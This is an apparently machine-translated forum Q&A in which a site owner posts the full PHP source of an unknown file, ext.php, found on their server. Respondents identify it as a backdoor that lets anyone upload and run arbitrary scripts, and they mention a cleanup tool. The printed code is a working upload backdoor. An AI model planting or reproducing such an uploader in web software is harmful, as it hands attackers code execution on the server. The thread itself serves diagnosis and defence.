我正在查看我的一个站点的服务器,我注意到一个我不认识的文件(该文件可能是由过去在该服务器上工作的其他人上传的)
该文件是一个名为ext.php的php文件,并满足了上传文件的形式
<?php
error_reporting(0);
@ini_set("display_errors", 0);
$var= $_SERVER['PHP_SELF']."?";
$form ='<form enctype="multipart/form-data" action="'.$var.'" method="POST"><input name="uploadFile" type="file"/><br/><input type="submit" value="Upload" /></form>';
if (!empty($_FILES['uploadFile'])) {
$self=dirname(__FILE__);
move_uploaded_file($_FILES["uploadFile"]["tmp_name"], $self.DIRECTORY_SEPARATOR.$_FILES["uploadFile"]["name"]);
$time=filemtime($self);print "OK";
} else { print $form; } ?>
这是一个潜在的后门黑客脚本吗?上面的代码到底做了什么?我正在尝试诊断问题,并确定此脚本可能造成的潜在损害。
是的,任何人都可以将"somescritpt.php"上传到您的网站,它将以网站的权限执行,其中包含任何代码。所以这是后门。
即使回答了这个问题,这是我创建的用于清除后门恶意软件中的多站点服务器的代码。即使有一些备份,有太多的1000个文件带有垃圾代码,值得编写一个更干净的脚本。
有关更多信息,请查看 GitHub 上的纳尼亚卫报
这不是包含代码的完整答案,因为它跨越多个文件。如果你深入研究它是如何工作的(它很快),它可以节省很多麻烦,你可以成为当天的英雄,在几分钟内恢复坏服务器。